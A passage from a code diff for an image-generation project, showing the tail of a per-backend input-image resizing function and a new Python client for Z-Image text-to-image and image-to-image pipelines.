    Each non-None entry is run through preprocess_input_image with a
    backend-appropriate maximum edge length; None entries are preserved so
    the output list stays positionally aligned with the input.

    Args:
        images: List of PIL Images (entries may be None)
        backend_type: Backend type string (e.g., 'flux_klein', 'qwen_comfyui')
        aspect_ratio: Target aspect ratio (currently unused; kept for
            backward-compatible signature)

    Returns:
        List of preprocessed PIL Images
    """
    if not images:
        return images

    # Per-backend maximum input edge. FLUX-family models are faster with
    # smaller inputs (quality comes from the model, not input size);
    # Gemini handles larger but 1024 is sufficient.
    size_caps = {
        'flux_klein': 768,
        'flux_klein_9b_fp8': 768,
        'qwen_image_edit': 1024,
        'qwen_comfyui': 1024,
        'zimage_turbo': 768,
        'zimage_base': 768,
        'longcat_edit': 768,
        'gemini_flash': 1024,
        'gemini_pro': 1024,
    }
    cap = size_caps.get(backend_type, 1024)

    return [
        preprocess_input_image(img, max_size=cap) if img is not None else None
        for img in images
    ]
|
src/zimage_client.py
ADDED
|
@@ -0,0 +1,351 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Z-Image Client
|
| 3 |
+
==============
|
| 4 |
+
|
| 5 |
+
Client for Z-Image (Tongyi-MAI) local image generation.
|
| 6 |
+
Supports text-to-image and image-to-image editing.
|
| 7 |
+
|
| 8 |
+
Z-Image is a 6B parameter model that achieves state-of-the-art quality
|
| 9 |
+
with only 8-9 inference steps, fitting in 16GB VRAM.
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import logging
|
| 13 |
+
import time
|
| 14 |
+
from typing import Optional, List
|
| 15 |
+
from PIL import Image
|
| 16 |
+
|
| 17 |
+
import torch
|
| 18 |
+
|
| 19 |
+
from .models import GenerationRequest, GenerationResult
|
| 20 |
+
|
| 21 |
+
|
| 22 |
+
logger = logging.getLogger(__name__)
|
| 23 |
+
|
| 24 |
+
|
| 25 |
+
class ZImageClient:
|
| 26 |
+
"""
|
| 27 |
+
Client for Z-Image models from Tongyi-MAI.
|
| 28 |
+
|
| 29 |
+
Supports:
|
| 30 |
+
- Text-to-image generation (ZImagePipeline)
|
| 31 |
+
- Image-to-image editing (ZImageImg2ImgPipeline)
|
| 32 |
+
- Multiple model variants (Turbo, Base, Edit, Omni)
|
| 33 |
+
"""
|
| 34 |
+
|
| 35 |
+
# Model variants
|
| 36 |
+
MODELS = {
|
| 37 |
+
# Turbo - Fast, distilled, 8-9 steps, fits 16GB VRAM
|
| 38 |
+
"turbo": "Tongyi-MAI/Z-Image-Turbo",
|
| 39 |
+
# Base - Quality-focused, more steps
|
| 40 |
+
"base": "Tongyi-MAI/Z-Image",
|
| 41 |
+
# Edit - Fine-tuned for instruction-following image editing
|
| 42 |
+
"edit": "Tongyi-MAI/Z-Image-Edit",
|
| 43 |
+
# Omni - Versatile, supports both generation and editing
|
| 44 |
+
"omni": "Tongyi-MAI/Z-Image-Omni-Base",
|
| 45 |
+
}
|
| 46 |
+
|
| 47 |
+
# Aspect ratio to dimensions mapping
|
| 48 |
+
# Z-Image supports 512x512 to 2048x2048
|
| 49 |
+
ASPECT_RATIOS = {
|
| 50 |
+
"1:1": (1024, 1024),
|
| 51 |
+
"16:9": (1344, 768),
|
| 52 |
+
"9:16": (768, 1344),
|
| 53 |
+
"21:9": (1536, 640), # Cinematic ultra-wide
|
| 54 |
+
"3:2": (1248, 832),
|
| 55 |
+
"2:3": (832, 1248),
|
| 56 |
+
"3:4": (896, 1152),
|
| 57 |
+
"4:3": (1152, 896),
|
| 58 |
+
"4:5": (896, 1120),
|
| 59 |
+
"5:4": (1120, 896),
|
| 60 |
+
}
|
| 61 |
+
|
| 62 |
+
# Default settings for each model variant
|
| 63 |
+
MODEL_DEFAULTS = {
|
| 64 |
+
"turbo": {"steps": 9, "guidance": 0.0}, # Fast, no CFG needed
|
| 65 |
+
"base": {"steps": 50, "guidance": 4.0}, # Quality-focused
|
| 66 |
+
"edit": {"steps": 28, "guidance": 3.5}, # Editing
|
| 67 |
+
"omni": {"steps": 28, "guidance": 3.5}, # Versatile
|
| 68 |
+
}
|
| 69 |
+
|
| 70 |
+
def __init__(
|
| 71 |
+
self,
|
| 72 |
+
model_variant: str = "turbo",
|
| 73 |
+
device: str = "cuda",
|
| 74 |
+
dtype: torch.dtype = torch.bfloat16,
|
| 75 |
+
enable_cpu_offload: bool = True,
|
| 76 |
+
):
|
| 77 |
+
"""
|
| 78 |
+
Initialize Z-Image client.
|
| 79 |
+
|
| 80 |
+
Args:
|
| 81 |
+
model_variant: Model variant to use:
|
| 82 |
+
- "turbo": Fast, 9 steps, 16GB VRAM (RECOMMENDED)
|
| 83 |
+
- "base": Quality-focused, 50 steps
|
| 84 |
+
- "edit": Instruction-following image editing
|
| 85 |
+
- "omni": Versatile generation + editing
|
| 86 |
+
device: Device to use (cuda or cpu)
|
| 87 |
+
dtype: Data type for model weights (bfloat16 recommended)
|
| 88 |
+
enable_cpu_offload: Enable CPU offload to save VRAM
|
| 89 |
+
"""
|
| 90 |
+
self.model_variant = model_variant
|
| 91 |
+
self.device = device
|
| 92 |
+
self.dtype = dtype
|
| 93 |
+
self.enable_cpu_offload = enable_cpu_offload
|
| 94 |
+
self.pipe = None
|
| 95 |
+
self.pipe_img2img = None
|
| 96 |
+
self._loaded = False
|
| 97 |
+
|
| 98 |
+
# Get default settings for this variant
|
| 99 |
+
defaults = self.MODEL_DEFAULTS.get(model_variant, {"steps": 9, "guidance": 0.0})
|
| 100 |
+
self.default_steps = defaults["steps"]
|
| 101 |
+
self.default_guidance = defaults["guidance"]
|
| 102 |
+
|
| 103 |
+
logger.info(f"ZImageClient initialized (variant: {model_variant}, steps: {self.default_steps}, guidance: {self.default_guidance})")
|
| 104 |
+
|
| 105 |
+
def load_model(self) -> bool:
|
| 106 |
+
"""Load the model into memory."""
|
| 107 |
+
if self._loaded:
|
| 108 |
+
return True
|
| 109 |
+
|
| 110 |
+
try:
|
| 111 |
+
# Get model ID for selected variant
|
| 112 |
+
model_id = self.MODELS.get(self.model_variant, self.MODELS["turbo"])
|
| 113 |
+
logger.info(f"Loading Z-Image ({self.model_variant}) from {model_id}...")
|
| 114 |
+
|
| 115 |
+
start_time = time.time()
|
| 116 |
+
|
| 117 |
+
# Import diffusers pipelines for Z-Image
|
| 118 |
+
# Requires latest diffusers: pip install git+https://github.com/huggingface/diffusers
|
| 119 |
+
from diffusers import ZImagePipeline, ZImageImg2ImgPipeline
|
| 120 |
+
|
| 121 |
+
# Load text-to-image pipeline
|
| 122 |
+
self.pipe = ZImagePipeline.from_pretrained(
|
| 123 |
+
model_id,
|
| 124 |
+
torch_dtype=self.dtype,
|
| 125 |
+
)
|
| 126 |
+
|
| 127 |
+
# Load img2img pipeline (shares components)
|
| 128 |
+
self.pipe_img2img = ZImageImg2ImgPipeline.from_pretrained(
|
| 129 |
+
model_id,
|
| 130 |
+
torch_dtype=self.dtype,
|
| 131 |
+
# Share components to save memory
|
| 132 |
+
text_encoder=self.pipe.text_encoder,
|
| 133 |
+
tokenizer=self.pipe.tokenizer,
|
| 134 |
+
vae=self.pipe.vae,
|
| 135 |
+
transformer=self.pipe.transformer,
|
| 136 |
+
scheduler=self.pipe.scheduler,
|
| 137 |
+
)
|
| 138 |
+
|
| 139 |
+
# Apply memory optimization
|
| 140 |
+
if self.enable_cpu_offload:
|
| 141 |
+
self.pipe.enable_model_cpu_offload()
|
| 142 |
+
self.pipe_img2img.enable_model_cpu_offload()
|
| 143 |
+
logger.info("CPU offload enabled")
|
| 144 |
+
else:
|
| 145 |
+
self.pipe.to(self.device)
|
| 146 |
+
self.pipe_img2img.to(self.device)
|
| 147 |
+
logger.info(f"Model moved to {self.device}")
|
| 148 |
+
|
| 149 |
+
# Optional: Enable flash attention if available
|
| 150 |
+
try:
|
| 151 |
+
self.pipe.transformer.set_attention_backend("flash")
|
| 152 |
+
self.pipe_img2img.transformer.set_attention_backend("flash")
|
| 153 |
+
logger.info("Flash Attention enabled")
|
| 154 |
+
except Exception:
|
| 155 |
+
logger.info("Flash Attention not available, using default SDPA")
|
| 156 |
+
|
| 157 |
+
load_time = time.time() - start_time
|
| 158 |
+
logger.info(f"Z-Image ({self.model_variant}) loaded in {load_time:.1f}s")
|
| 159 |
+
|
| 160 |
+
# Validate by running a test generation
|
| 161 |
+
logger.info("Validating model with test generation...")
|
| 162 |
+
try:
|
| 163 |
+
test_result = self.pipe(
|
| 164 |
+
prompt="A simple test image",
|
| 165 |
+
height=256,
|
| 166 |
+
width=256,
|
| 167 |
+
guidance_scale=0.0,
|
| 168 |
+
num_inference_steps=2,
|
| 169 |
+
generator=torch.Generator(device="cpu").manual_seed(42),
|
| 170 |
+
)
|
| 171 |
+
if test_result.images[0] is not None:
|
| 172 |
+
logger.info("Model validation successful")
|
| 173 |
+
else:
|
| 174 |
+
logger.error("Model validation failed: no output image")
|
| 175 |
+
return False
|
| 176 |
+
except Exception as e:
|
| 177 |
+
logger.error(f"Model validation failed: {e}", exc_info=True)
|
| 178 |
+
return False
|
| 179 |
+
|
| 180 |
+
self._loaded = True
|
| 181 |
+
return True
|
| 182 |
+
|
| 183 |
+
except Exception as e:
|
| 184 |
+
logger.error(f"Failed to load Z-Image: {e}", exc_info=True)
|
| 185 |
+
return False
|
| 186 |
+
|
| 187 |
+
def unload_model(self):
|
| 188 |
+
"""Unload model from memory."""
|
| 189 |
+
if self.pipe is not None:
|
| 190 |
+
del self.pipe
|
| 191 |
+
self.pipe = None
|
| 192 |
+
if self.pipe_img2img is not None:
|
| 193 |
+
del self.pipe_img2img
|
| 194 |
+
self.pipe_img2img = None
|
| 195 |
+
|
| 196 |
+
self._loaded = False
|
| 197 |
+
|
| 198 |
+
if torch.cuda.is_available():
|
| 199 |
+
torch.cuda.empty_cache()
|
| 200 |
+
|
| 201 |
+
logger.info("Z-Image unloaded")
|
| 202 |
+
|
| 203 |
+
def generate(
|
| 204 |
+
self,
|
| 205 |
+
request: GenerationRequest,
|
| 206 |
+
num_inference_steps: int = None,
|
| 207 |
+
guidance_scale: float = None
|
| 208 |
+
) -> GenerationResult:
|
| 209 |
+
"""
|
| 210 |
+
Generate image using Z-Image.
|
| 211 |
+
|
| 212 |
+
Args:
|
| 213 |
+
request: GenerationRequest object
|
| 214 |
+
num_inference_steps: Number of denoising steps (9 for turbo)
|
| 215 |
+
guidance_scale: Classifier-free guidance scale (0.0 for turbo)
|
| 216 |
+
|
| 217 |
+
Returns:
|
| 218 |
+
GenerationResult object
|
| 219 |
+
"""
|
| 220 |
+
if not self._loaded:
|
| 221 |
+
if not self.load_model():
|
| 222 |
+
return GenerationResult.error_result("Failed to load Z-Image model")
|
| 223 |
+
|
| 224 |
+
# Use model defaults if not specified
|
| 225 |
+
if num_inference_steps is None:
|
| 226 |
+
num_inference_steps = self.default_steps
|
| 227 |
+
if guidance_scale is None:
|
| 228 |
+
guidance_scale = self.default_guidance
|
| 229 |
+
|
| 230 |
+
try:
|
| 231 |
+
start_time = time.time()
|
| 232 |
+
|
| 233 |
+
# Get dimensions from aspect ratio
|
| 234 |
+
width, height = self._get_dimensions(request.aspect_ratio)
|
| 235 |
+
|
| 236 |
+
logger.info(f"Generating with Z-Image {self.model_variant}: steps={num_inference_steps}, guidance={guidance_scale}")
|
| 237 |
+
|
| 238 |
+
# Check if we have input images (use img2img pipeline)
|
| 239 |
+
if request.has_input_images:
|
| 240 |
+
return self._generate_img2img(
|
| 241 |
+
request, width, height, num_inference_steps, guidance_scale, start_time
|
| 242 |
+
)
|
| 243 |
+
|
| 244 |
+
# Text-to-image generation
|
| 245 |
+
gen_kwargs = {
|
| 246 |
+
"prompt": request.prompt,
|
| 247 |
+
"height": height,
|
| 248 |
+
"width": width,
|
| 249 |
+
"guidance_scale": guidance_scale,
|
| 250 |
+
"num_inference_steps": num_inference_steps,
|
| 251 |
+
"generator": torch.Generator(device="cpu").manual_seed(42),
|
| 252 |
+
}
|
| 253 |
+
|
| 254 |
+
# Add negative prompt if present
|
| 255 |
+
if request.negative_prompt:
|
| 256 |
+
gen_kwargs["negative_prompt"] = request.negative_prompt
|
| 257 |
+
|
| 258 |
+
logger.info(f"Generating with Z-Image: {request.prompt[:80]}...")
|
| 259 |
+
|
| 260 |
+
# Generate
|
| 261 |
+
with torch.inference_mode():
|
| 262 |
+
output = self.pipe(**gen_kwargs)
|
| 263 |
+
image = output.images[0]
|
| 264 |
+
|
| 265 |
+
generation_time = time.time() - start_time
|
| 266 |
+
logger.info(f"Generated in {generation_time:.2f}s: {image.size}")
|
| 267 |
+
|
| 268 |
+
return GenerationResult.success_result(
|
| 269 |
+
image=image,
|
| 270 |
+
message=f"Generated with Z-Image ({self.model_variant}) in {generation_time:.2f}s",
|
| 271 |
+
generation_time=generation_time
|
| 272 |
+
)
|
| 273 |
+
|
| 274 |
+
except Exception as e:
|
| 275 |
+
logger.error(f"Z-Image generation failed: {e}", exc_info=True)
|
| 276 |
+
return GenerationResult.error_result(f"Z-Image error: {str(e)}")
|
| 277 |
+
|
| 278 |
+
def _generate_img2img(
|
| 279 |
+
self,
|
| 280 |
+
request: GenerationRequest,
|
| 281 |
+
width: int,
|
| 282 |
+
height: int,
|
| 283 |
+
num_inference_steps: int,
|
| 284 |
+
guidance_scale: float,
|
| 285 |
+
start_time: float
|
| 286 |
+
) -> GenerationResult:
|
| 287 |
+
"""Generate using img2img pipeline with input images."""
|
| 288 |
+
try:
|
| 289 |
+
# Get the first valid input image
|
| 290 |
+
input_image = None
|
| 291 |
+
for img in request.input_images:
|
| 292 |
+
if img is not None:
|
| 293 |
+
input_image = img
|
| 294 |
+
break
|
| 295 |
+
|
| 296 |
+
if input_image is None:
|
| 297 |
+
return GenerationResult.error_result("No valid input image provided")
|
| 298 |
+
|
| 299 |
+
# Resize input image to target dimensions
|
| 300 |
+
input_image = input_image.resize((width, height), Image.Resampling.LANCZOS)
|
| 301 |
+
|
| 302 |
+
# Build generation kwargs for img2img
|
| 303 |
+
gen_kwargs = {
|
| 304 |
+
"prompt": request.prompt,
|
| 305 |
+
"image": input_image,
|
| 306 |
+
"strength": 0.6, # How much to transform the image
|
| 307 |
+
"height": height,
|
| 308 |
+
"width": width,
|
| 309 |
+
"guidance_scale": guidance_scale,
|
| 310 |
+
"num_inference_steps": num_inference_steps,
|
| 311 |
+
"generator": torch.Generator(device="cpu").manual_seed(42),
|
| 312 |
+
}
|
| 313 |
+
|
| 314 |
+
# Add negative prompt if present
|
| 315 |
+
if request.negative_prompt:
|
| 316 |
+
gen_kwargs["negative_prompt"] = request.negative_prompt
|
| 317 |
+
|
| 318 |
+
logger.info(f"Generating img2img with Z-Image: {request.prompt[:80]}...")
|
| 319 |
+
|
| 320 |
+
# Generate
|
| 321 |
+
with torch.inference_mode():
|
| 322 |
+
output = self.pipe_img2img(**gen_kwargs)
|
| 323 |
+
image = output.images[0]
|
| 324 |
+
|
| 325 |
+
generation_time = time.time() - start_time
|
| 326 |
+
logger.info(f"Generated img2img in {generation_time:.2f}s: {image.size}")
|
| 327 |
+
|
| 328 |
+
return GenerationResult.success_result(
|
| 329 |
+
image=image,
|
| 330 |
+
message=f"Generated with Z-Image img2img ({self.model_variant}) in {generation_time:.2f}s",
|
| 331 |
+
generation_time=generation_time
|
| 332 |
+
)
|
| 333 |
+
|
| 334 |
+
except Exception as e:
|
| 335 |
+
logger.error(f"Z-Image img2img generation failed: {e}", exc_info=True)
|
| 336 |
+
return GenerationResult.error_result(f"Z-Image img2img error: {str(e)}")
|
| 337 |
+
|
| 338 |
+
def _get_dimensions(self, aspect_ratio: str) -> tuple:
|
| 339 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 340 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 341 |
+
return self.ASPECT_RATIOS.get(ratio, (1024, 1024))
|
| 342 |
+
|
| 343 |
+
def is_healthy(self) -> bool:
|
| 344 |
+
"""Check if model is loaded and ready."""
|
| 345 |
+
return self._loaded and self.pipe is not None
|
| 346 |
+
|
| 347 |
+
@classmethod
|
| 348 |
+
def get_dimensions(cls, aspect_ratio: str) -> tuple:
|
| 349 |
+
"""Get pixel dimensions for aspect ratio."""
|
| 350 |
+
ratio = aspect_ratio.split()[0] if " " in aspect_ratio else aspect_ratio
|
| 351 |
+
return cls.ASPECT_RATIOS.get(ratio, (1024, 1024))
|